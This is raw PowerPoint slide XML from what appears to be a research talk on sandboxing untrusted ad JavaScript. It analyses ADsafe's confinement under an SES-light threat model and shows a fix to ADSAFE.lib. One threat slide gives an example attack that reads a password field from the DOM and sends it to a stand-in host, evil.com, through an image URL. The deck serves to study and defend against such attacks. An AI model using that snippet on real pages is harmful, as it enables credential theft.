              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static filter for JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-182880">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Restricts accessible global variables to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>ADSAFE”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-182880"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="-182880">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Security Goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Confinement of DOM elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="-274320"/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2963" y="1066800"/>
            <a:ext cx="8901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Mechanism for safely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>embedding untrusted advertisements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6200" y="2095500"/>
            <a:ext cx="4114800" cy="3619500"/>
            <a:chOff x="152400" y="1371600"/>
            <a:chExt cx="5105400" cy="4114800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="laptop"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="152400" y="1371600"/>
              <a:ext cx="5105400" cy="4114800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2147483647 h 21600"/>
                <a:gd name="T8" fmla="*/ 2147483647 w 21600"/>
                <a:gd name="T9" fmla="*/ 0 h 21600"/>
                <a:gd name="T10" fmla="*/ 2147483647 w 21600"/>
                <a:gd name="T11" fmla="*/ 2147483647 h 21600"/>
                <a:gd name="T12" fmla="*/ 0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5 w 21600"/>
                <a:gd name="T25" fmla="*/ 1858 h 21600"/>
                <a:gd name="T26" fmla="*/ 17311 w 21600"/>
                <a:gd name="T27" fmla="*/ 1232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143000" y="1676400"/>
              <a:ext cx="3143250" cy="215265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anchorCtr="0"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6350" y="3352800"/>
              <a:ext cx="2762250" cy="381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anchorCtr="0"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Original DOM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00200" y="2910416"/>
              <a:ext cx="2286000" cy="44238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t" anchorCtr="0"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ADSafe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> DOM API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352550" y="2061864"/>
              <a:ext cx="2762250" cy="86760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3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 smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Ad code filtered using </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>JSLint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874594" y="2364123"/>
            <a:ext cx="12810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Hosting Page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5817513"/>
            <a:ext cx="91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We analyze confinement of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>AdSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> API under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>light</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> threat model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Analyzing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> API Implementation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3399473"/>
            <a:ext cx="8686800" cy="1477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 Running ENCAP (takes approx. 5 minutes)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: 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We obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT CONFINED 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Identified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADSAFE.lib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00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADSAFE.go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> as the culprits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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1219200"/>
            <a:ext cx="8686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74320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Desugared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> API implementation to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>light</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Added (trusted) annotations to improve precision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="-274320">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>$Nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: Added to patterns of the form </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	for(…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>…){…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o[i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>,$Nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]…}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="-274320">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a couple of others, see paper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7" name="Picture 6" descr="adsafeAttac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0105"/>
            <a:ext cx="9144000" cy="5606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1"/>
            <a:ext cx="8686800" cy="1219199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ADSAFE.lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> with the following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="-274320">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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9220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</a:rPr>
              <a:t>ADSAFE.lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> = function(name, f){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>			     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>if(!reject_name(name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>				    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>adsafe_lib[name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>f(adsafe_lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>				  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>			   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier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429000"/>
            <a:ext cx="8686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 running ENCAP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>We obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONFINED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> API is confined under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SES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light</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> threat model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 assuming the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>annotations hold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2971800"/>
            <a:ext cx="8686800" cy="1219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Currently adopted by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AdSafe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0050" marR="0" lvl="1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7432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Embedded JavaScript Security Threats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 descr="admashu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8809926" cy="48944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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="2891744"/>
            <a:ext cx="1600200" cy="1908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73064" y="1267945"/>
            <a:ext cx="5646736" cy="490425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90600" y="914400"/>
            <a:ext cx="7620000" cy="33855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ourier"/>
              </a:rPr>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>“http://adpublisher.com/ad1.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier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2971800" y="2133600"/>
            <a:ext cx="3048000" cy="922799"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64180"/>
              <a:gd name="adj2" fmla="val 56752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Has direct access to the entire JavaScript DOM API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381000" y="1676400"/>
            <a:ext cx="5608059" cy="865518"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56396"/>
              <a:gd name="adj2" fmla="val 11238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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Can read password from the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r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"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r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 = document.getElementsByName(“password”)[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US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335541" y="4849482"/>
            <a:ext cx="5653518" cy="865518"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54584"/>
              <a:gd name="adj2" fmla="val -100373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Sending information is not subject to same-origin policy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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r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"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r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=``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>http::www.evil.com/info.jpg?_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>_”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier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-152400" y="3310498"/>
            <a:ext cx="6553200" cy="1032902"/>
            <a:chOff x="238730" y="2869291"/>
            <a:chExt cx="6117599" cy="860751"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rounded Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="422860" y="2869291"/>
              <a:ext cx="5791199" cy="86075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8730" y="2894498"/>
              <a:ext cx="6117599" cy="7437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 smtClean="0"/>
                <a:t>Sandbox untrusted code and only provide it with restricted access to the DOM </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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219200"/>
            <a:ext cx="89154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74320">
              <a:buFont typeface="Arial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Conclusions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-274320">
              <a:buFont typeface="Lucida Grande"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SES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light</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is more amenable to static analysis than ES3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-274320">
              <a:buFont typeface="Lucida Grande"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Can soundly establish API confinement via analysi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>s of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Future Work:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-274320">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Improve precision by restricting trusted code to more disciplined subsets with untrusted code still in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>light</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-274320">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Consider multiple untrusted components instead of one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-274320">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Static analysis techniques for checking more complex properties like Defensive Consistency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-274320">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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304800" y="5226050"/>
            <a:ext cx="8610600" cy="71755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Thank You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Language-based Sandboxing (This Work)	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laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1371600"/>
            <a:ext cx="5105400" cy="4114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43000" y="1676400"/>
            <a:ext cx="3143250" cy="2152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6350" y="3352800"/>
            <a:ext cx="2762250" cy="381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algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protected resources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00200" y="2910416"/>
            <a:ext cx="2286000" cy="44238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t" anchorCtr="0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</a:rPr>
              <a:t>API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52550" y="2061864"/>
            <a:ext cx="2762250" cy="8676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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sandboxed code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Can 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="1981200"/>
            <a:ext cx="1066800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2403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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.com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(3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rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party)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Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6874668" y="2209800"/>
            <a:ext cx="973931" cy="36271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" y="5717232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Facebook FBJS, Yahoo! ADSafe, Google Caja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800600" y="30480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840942" y="1824335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9" name="Can 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5878513" y="3124200"/>
            <a:ext cx="1055687" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2403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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A.com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(hosting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Page)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5878513" y="1828800"/>
            <a:ext cx="1512887" cy="1104900"/>
            <a:chOff x="5878513" y="1828800"/>
            <a:chExt cx="1512887" cy="1104900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Manual Operation 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5824141" y="1883172"/>
              <a:ext cx="1104900" cy="996156"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartManualOperation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urier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878513" y="2035485"/>
              <a:ext cx="15128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JS Filter &amp; Rewriter</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0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5486400" y="1371600"/>
            <a:ext cx="1905000" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400"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urier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Down Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4800600" y="1524000"/>
            <a:ext cx="381000" cy="1752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943600" y="4343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Trusted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0" y="2754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Untrusted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 rot="5400000">
            <a:off x="4912708" y="2790874"/>
            <a:ext cx="316468" cy="1569384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7" grpId="0"/>
      <p:bldP spid="2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16-Point Star 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752597" y="2740740"/>
            <a:ext cx="457203" cy="450416"/>
          </a:xfrm>
          <a:prstGeom prst="star16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Mediated Access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ffectLst/>
        </p:spPr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60403989-3EFF-4C4D-9A9D-F370A7D41F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219200" y="1964381"/>
            <a:ext cx="457200" cy="457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81000" y="3572157"/>
            <a:ext cx="457200" cy="457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62000" y="2726381"/>
            <a:ext cx="457200" cy="457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9" idx="4"/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1066800" y="2345381"/>
            <a:ext cx="304800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill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4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1520212" y="2349169"/>
